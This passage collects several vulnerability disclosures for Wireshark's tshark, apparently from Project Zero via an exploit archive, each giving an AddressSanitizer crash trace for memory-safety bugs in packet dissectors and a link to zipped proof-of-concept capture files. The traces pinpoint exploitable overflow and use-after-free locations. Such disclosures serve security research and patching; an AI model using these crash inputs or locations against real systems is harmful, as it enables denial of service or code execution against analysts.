#15 0x7ff74b98a9dd in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4615:9
#16 0x7ff74b990043 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#17 0x7ff74b98b39c in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#18 0x7ff74b9a07a3 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#19 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#20 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#21 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#22 0x7ff74aae688b in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#23 0x7ff74aaf12b9 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#24 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#25 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#26 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#27 0x7ff7499d9964 in dissector_try_uint wireshark/epan/packet.c:1174:9
#28 0x7ff74a5f848d in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#29 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#31 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#32 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#33 0x7ff74a5f4725 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#34 0x7ff74a5ecf33 in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#35 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#36 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#37 0x7ff7499d8dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#38 0x7ff74a6e85f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#39 0x7ff7499e6cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#40 0x7ff7499d95ea in call_dissector_work wireshark/epan/packet.c:691:9
#41 0x7ff7499e32be in call_dissector_only wireshark/epan/packet.c:2662:8
#42 0x7ff7499d4ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#43 0x7ff7499d433b in dissect_record wireshark/epan/packet.c:501:3
#44 0x7ff7499823c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#45 0x5264eb in process_packet wireshark/tshark.c:3728:5
#46 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#47 0x515daf in main wireshark/tshark.c:2197:13
0x7ff755ab5a18 is located 0 bytes to the right of global variable 'rsl_att_tlvdef' defined in 'packet-rsl.c:685:30' (0x7ff755ab5220) of size 2040
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-rsl.c:3055:23 in dissct_rsl_ipaccess_msg
Shadow bytes around the buggy address:
0x0fff6ab4eaf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0fff6ab4eb30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0fff6ab4eb40: 00 00 00[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb60: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb70: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb80: 04 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
0x0fff6ab4eb90: 00 f9 f9 f9 f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7557==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11829. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38996.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=655
The following crash due to a stack-based buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==3325==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fff80063d1c at pc 0x0000004aaf56 bp 0x7fff80063a50 sp 0x7fff80063200
WRITE of size 202 at 0x7fff80063d1c thread T0
#0 0x4aaf55 in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#1 0x7fb265728fad in file_read wireshark/wiretap/file_wrappers.c:1222:13
#2 0x7fb2658ae866 in wtap_read_bytes_or_eof wireshark/wiretap/wtap.c:1363:15
#3 0x7fb265783fac in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:178:14
#4 0x7fb265782bfa in mp2t_bits_per_second wireshark/wiretap/mp2t.c:236:10
#5 0x7fb2657823a0 in mp2t_open wireshark/wiretap/mp2t.c:363:14
#6 0x7fb265716911 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
#7 0x51bd1d in cf_open wireshark/tshark.c:4195:9
#8 0x51584e in main wireshark/tshark.c:2188:9
Address 0x7fff80063d1c is located in stack of thread T0 at offset 220 in frame
#0 0x7fb265783cdf in mp2t_find_next_pcr wireshark/wiretap/mp2t.c:170
This frame has 1 object(s):
[32, 220) 'buffer' <== Memory access at offset 220 overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: stack-buffer-overflow llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393 in __asan_memcpy
Shadow bytes around the buggy address:
0x100070004750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x100070004780: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00
0x100070004790: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x1000700047a0: 00 00 00[04]f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00
0x1000700047b0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x1000700047e0: f1 f1 f1 f1 00 f2 f2 f2 00 f2 f2 f2 02 f2 02 f2
0x1000700047f0: 04 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3325==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11820. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38997.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=653
The following SIGSEGV crash due to an invalid memory write can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==31799==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000fff3 (pc 0x7f538efe2e98 bp 0x7ffff1414290 sp 0x7ffff1413a18 T0)
#0 0x7f538efe2e97 /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
#1 0x4aaeac in __asan_memcpy llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:393
#2 0x7f53989ebdee in get_value wireshark/epan/dissectors/packet-btatt.c:6021:9
#3 0x7f53989cd2a1 in dissect_btatt wireshark/epan/dissectors/packet-btatt.c:6434:40
#4 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#5 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#6 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#7 0x7f5398abde89 in dissect_btl2cap wireshark/epan/dissectors/packet-btl2cap.c:2217:26
#8 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#9 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#10 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#11 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#12 0x7f5398add99f in dissect_btle wireshark/epan/dissectors/packet-btle.c:760:21
#13 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#15 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#16 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#17 0x7f5398ae089b in dissect_btle_rf wireshark/epan/dissectors/packet-btle_rf.c:221:27
#18 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#20 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0x7f53989467c5 in dissect_bluetooth wireshark/epan/dissectors/packet-bluetooth.c:1748:10
#22 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#23 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#24 0x7f539840ddbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#25 0x7f539911d5f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#26 0x7f539841bcc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#27 0x7f539840e5ea in call_dissector_work wireshark/epan/packet.c:691:9
#28 0x7f53984182be in call_dissector_only wireshark/epan/packet.c:2662:8
#29 0x7f5398409ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#30 0x7f539840933b in dissect_record wireshark/epan/packet.c:501:3
#31 0x7f53983b73c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#32 0x5264eb in process_packet wireshark/tshark.c:3728:5
#33 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#34 0x515daf in main wireshark/tshark.c:2197:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /build/buildd/eglibc-2.19/string/../sysdeps/x86_64/multiarch/memcpy-ssse3-back.S:1812
==31799==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11817. Attached are two files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38998.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=652
The following SIGSEGV crash due to an invalid memory read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==31034==ERROR: AddressSanitizer: SEGV on unknown address 0x7fc24e20fa84 (pc 0x7fbe445bb082 bp 0x7fff030fefb0 sp 0x7fff030fef00 T0)
#0 0x7fbe445bb081 in dissect_nbap_MACdPDU_Size wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79
#1 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#2 0x7fbe445c760d in dissect_nbap_HSDSCH_Initial_Capacity_AllocationItem wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1650:12
#3 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#4 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#5 0x7fbe445c7569 in dissect_nbap_HSDSCH_Initial_Capacity_Allocation wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1663:12
#6 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#7 0x7fbe445da43d in dissect_nbap_CommonMACFlow_Specific_InfoItem_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1682:12
#8 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#9 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#10 0x7fbe445da399 in dissect_nbap_CommonMACFlow_Specific_InfoList_Response wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1695:12
#11 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#12 0x7fbe445da2bd in dissect_nbap_HSDSCH_Common_System_Information_ResponseFDD wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2120:12
#13 0x7fbe44546230 in dissect_HSDSCH_Common_System_Information_ResponseFDD_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:2430:12
#14 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#15 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#16 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#17 0x7fbe4456f40e in dissect_ProtocolExtensionFieldExtensionValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:320:11
#18 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5
#19 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9
#20 0x7fbe4456f370 in dissect_nbap_T_extensionValue wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:200:12
#21 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#22 0x7fbe4456f12d in dissect_nbap_ProtocolExtensionField wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:215:12
#23 0x7fbe433b2fa3 in dissect_per_sequence_of_helper wireshark/epan/dissectors/packet-per.c:531:10
#24 0x7fbe433be23b in dissect_per_constrained_sequence_of wireshark/epan/dissectors/packet-per.c:905:9
#25 0x7fbe4456ef09 in dissect_nbap_ProtocolExtensionContainer wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:228:12
#26 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#27 0x7fbe445f23bf in dissect_nbap_CommonMeasurementInitiationRequest wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:263:12
#28 0x7fbe445644d0 in dissect_CommonMeasurementInitiationRequest_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:5030:12
#29 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#31 0x7fbe41b3802d in dissector_try_string wireshark/epan/packet.c:1443:9
#32 0x7fbe4456e3ce in dissect_InitiatingMessageValue wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:326:11
#33 0x7fbe433addf0 in dissect_per_open_type_internal wireshark/epan/dissectors/packet-per.c:242:5
#34 0x7fbe433ae10d in dissect_per_open_type_pdu_new wireshark/epan/dissectors/packet-per.c:263:9
#35 0x7fbe4456df10 in dissect_nbap_InitiatingMessage_value wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:702:12
#36 0x7fbe433ceb56 in dissect_per_sequence wireshark/epan/dissectors/packet-per.c:1866:12
#37 0x7fbe4456d91d in dissect_nbap_InitiatingMessage wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:719:12
#38 0x7fbe433cc861 in dissect_per_choice wireshark/epan/dissectors/packet-per.c:1714:13
#39 0x7fbe4456d881 in dissect_nbap_NBAP_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:825:12
#40 0x7fbe4456d740 in dissect_NBAP_PDU_PDU wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:8430:12
#41 0x7fbe444e889b in dissect_nbap wireshark/epan/dissectors/../../asn1/nbap/packet-nbap-template.c:457:9
#42 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#43 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#44 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#45 0x7fbe4378f98b in dissect_payload wireshark/epan/dissectors/packet-sctp.c:2517:9
#46 0x7fbe43786b88 in dissect_data_chunk wireshark/epan/dissectors/packet-sctp.c:3443:16
#47 0x7fbe4377fd99 in dissect_sctp_chunk wireshark/epan/dissectors/packet-sctp.c:4360:14
#48 0x7fbe4377cd03 in dissect_sctp_chunks wireshark/epan/dissectors/packet-sctp.c:4515:9
#49 0x7fbe4377acdf in dissect_sctp_packet wireshark/epan/dissectors/packet-sctp.c:4678:3
#50 0x7fbe43778cba in dissect_sctp wireshark/epan/dissectors/packet-sctp.c:4732:3
#51 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#52 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#53 0x7fbe41b35dbd in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#54 0x7fbe428455f6 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#55 0x7fbe41b43cc1 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#56 0x7fbe41b365ea in call_dissector_work wireshark/epan/packet.c:691:9
#57 0x7fbe41b402be in call_dissector_only wireshark/epan/packet.c:2662:8
#58 0x7fbe41b31ccf in call_dissector_with_data wireshark/epan/packet.c:2675:8
#59 0x7fbe41b3133b in dissect_record wireshark/epan/packet.c:501:3
#60 0x7fbe41adf3c9 in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#61 0x5264eb in process_packet wireshark/tshark.c:3728:5
#62 0x51f960 in load_cap_file wireshark/tshark.c:3484:11
#63 0x515daf in main wireshark/tshark.c:2197:13
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV wireshark/epan/dissectors/../../asn1/nbap/nbap.cnf:1622:79 in dissect_nbap_MACdPDU_Size
==31034==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11815. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38999.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=649
The following crash due to a static buffer overflow can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
--- cut ---
==8089==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000df60580 at pc 0x000000d6eb8c bp 0x7ffc622f4a80 sp 0x7ffc622f4a78
WRITE of size 1 at 0x00000df60580 thread T0
#0 0xd6eb8b in my_dgt_tbcd_unpack wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16
#1 0xd71258 in de_mid wireshark/epan/dissectors/packet-gsm_a_common.c:2270:9
#2 0x3c7ce02 in dissect_uma_IE wireshark/epan/dissectors/packet-uma.c:912:3
#3 0x3c7bfd1 in dissect_uma wireshark/epan/dissectors/packet-uma.c:1664:13
#4 0x1317640 in tcp_dissect_pdus wireshark/epan/dissectors/packet-tcp.c:2740:13
#5 0x3c7b62b in dissect_uma_tcp wireshark/epan/dissectors/packet-uma.c:1699:2
#6 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#7 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#8 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#9 0x1318ea7 in decode_tcp_ports wireshark/epan/dissectors/packet-tcp.c:4610:9
#10 0x131ea52 in process_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4668:13
#11 0x1319ad8 in dissect_tcp_payload wireshark/epan/dissectors/packet-tcp.c:4743:9
#12 0x132fb70 in dissect_tcp wireshark/epan/dissectors/packet-tcp.c:5575:13
#13 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#14 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#15 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#16 0x29c5318 in ip_try_dissect wireshark/epan/dissectors/packet-ip.c:2001:7
#17 0x29d0521 in dissect_ip_v4 wireshark/epan/dissectors/packet-ip.c:2485:10
#18 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#19 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#20 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#21 0xae5a38 in dissector_try_uint wireshark/epan/packet.c:1174:9
#22 0x24e0824 in dissect_ethertype wireshark/epan/dissectors/packet-ethertype.c:307:21
#23 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#24 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#25 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#26 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#27 0x24dc752 in dissect_eth_common wireshark/epan/dissectors/packet-eth.c:545:5
#28 0x24d499a in dissect_eth_maybefcs wireshark/epan/dissectors/packet-eth.c:828:5
#29 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#30 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#31 0xae4e1d in dissector_try_uint_new wireshark/epan/packet.c:1148:9
#32 0x25dca12 in dissect_frame wireshark/epan/dissectors/packet-frame.c:500:11
#33 0xaf3794 in call_dissector_through_handle wireshark/epan/packet.c:616:8
#34 0xae5692 in call_dissector_work wireshark/epan/packet.c:691:9
#35 0xaefb1b in call_dissector_only wireshark/epan/packet.c:2662:8
#36 0xae09f3 in call_dissector_with_data wireshark/epan/packet.c:2675:8
#37 0xadffde in dissect_record wireshark/epan/packet.c:501:3
#38 0xab6d0d in epan_dissect_run_with_taps wireshark/epan/epan.c:373:2
#39 0x53c91b in process_packet wireshark/tshark.c:3728:5
#40 0x535d90 in load_cap_file wireshark/tshark.c:3484:11
#41 0x52c1df in main wireshark/tshark.c:2197:13
0x00000df60580 is located 0 bytes to the right of global variable 'a_bigbuf' defined in 'packet-gsm_a_common.c:762:13' (0xdf60180) of size 1024
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/epan/dissectors/packet-gsm_a_common.c:1972:16 in my_dgt_tbcd_unpack
Shadow bytes around the buggy address:
0x000081be4060: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4070: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4080: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x000081be40b0:[f9]f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40c0: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9
0x000081be40d0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be40e0: 00 00 00 00 f9 f9 f9 f9 00 00 00 00 00 00 00 00
0x000081be40f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x000081be4100: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==8089==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11797. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39000.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=646
The following crash due to a static out-of-bounds read can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==5629==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000044bf7e6 at pc 0x0000009eb451 bp 0x7ffcd2fd6050 sp 0x7ffcd2fd6048
READ of size 1 at 0x0000044bf7e6 thread T0
#0 0x9eb450 in ascend_seek wireshark/wiretap/ascendtext.c:105:19
#1 0x9ea5e0 in ascend_open wireshark/wiretap/ascendtext.c:167:12
#2 0x83f7c6 in wtap_open_offline wireshark/wiretap/file_access.c:1042:13
#3 0x53214d in cf_open wireshark/tshark.c:4195:9
#4 0x52bc7e in main wireshark/tshark.c:2188:9
0x0000044bf7e6 is located 58 bytes to the left of global variable '<string literal>' defined in 'ascendtext.c:61:25' (0x44bf820) of size 10
'<string literal>' is ascii string 'PRI-XMIT-'
0x0000044bf7e6 is located 0 bytes to the right of global variable '<string literal>' defined in 'ascendtext.c:117:30' (0x44bf7e0) of size 6
'<string literal>' is ascii string 'Date:'
SUMMARY: AddressSanitizer: global-buffer-overflow wireshark/wiretap/ascendtext.c:105:19 in ascend_seek
Shadow bytes around the buggy address:
0x00008088fea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008088feb0: 00 00 00 00 05 f9 f9 f9 f9 f9 f9 f9 00 00 00 00
0x00008088fec0: 00 00 00 01 f9 f9 f9 f9 00 01 f9 f9 f9 f9 f9 f9
0x00008088fed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x00008088fee0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x00008088fef0: 00 00 00 00 00 00 f9 f9 f9 f9 f9 f9[06]f9 f9 f9
0x00008088ff00: f9 f9 f9 f9 00 02 f9 f9 f9 f9 f9 f9 00 01 f9 f9
0x00008088ff10: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
0x00008088ff20: f9 f9 f9 f9 06 f9 f9 f9 f9 f9 f9 f9 06 f9 f9 f9
0x00008088ff30: f9 f9 f9 f9 00 f9 f9 f9 f9 f9 f9 f9 07 f9 f9 f9
0x00008088ff40: f9 f9 f9 f9 00 00 01 f9 f9 f9 f9 f9 06 f9 f9 f9
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5629==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=11794. Attached are three files which trigger the crash.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39001.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=645
The following crash due to a use-after-free condition can be observed in an ASAN build of Wireshark (current git master), by feeding a malformed file to tshark ("$ ./tshark -nVxr /path/to/file"):
Attached are three files which trigger the crash.
--- cut ---
==5117==ERROR: AddressSanitizer: heap-use-after-free on address 0x61b00001e3b2 at pc 0x000000499bad bp 0x7ffd2111f650 sp 0x7ffd2111ee00
READ of size 4 at 0x61b00001e3b2 thread T0
#0 0x499bac in memcmp llvm/projects/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:416
#1 0x37949bc in addresses_equal wireshark/epan/dissectors/./../address.h:140:26
#2 0x379389a in rsvp_equal wireshark/epan/dissectors/packet-rsvp.c:1886:13
#3 0x7f77e4ae95ef in g_hash_table_lookup (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x385ef)
#4 0x3796e2d in dissect_rsvp_common wireshark/epan/dissectors/packet-rsvp.c:7531:37
